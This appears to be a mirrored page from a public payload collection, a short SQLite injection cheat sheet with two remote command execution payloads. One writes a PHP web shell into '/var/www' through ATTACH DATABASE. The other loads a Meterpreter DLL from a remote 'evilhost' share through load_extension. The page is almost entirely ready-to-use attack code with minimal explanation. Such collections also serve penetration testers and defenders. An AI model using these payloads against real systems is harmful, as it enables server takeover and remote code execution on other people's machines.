mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-20 19:36:11 +00:00
14 lines
443 B
Markdown
14 lines
443 B
Markdown
# SQLite
|
||
|
||
##Remote Command Execution using SQLite command - Attach Database
|
||
```
|
||
ATTACH DATABASE ‘/var/www/lol.php’ AS lol;
|
||
CREATE TABLE lol.pwn (dataz text);
|
||
INSERT INTO lol.pwn (dataz) VALUES (‘<?system($_GET[‘cmd’]); ?>’);--
|
||
```
|
||
|
||
##Remote Command Execution using SQLite command - Load_extension
|
||
```
|
||
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
|
||
```
|
||
Note: By default this component is disabled |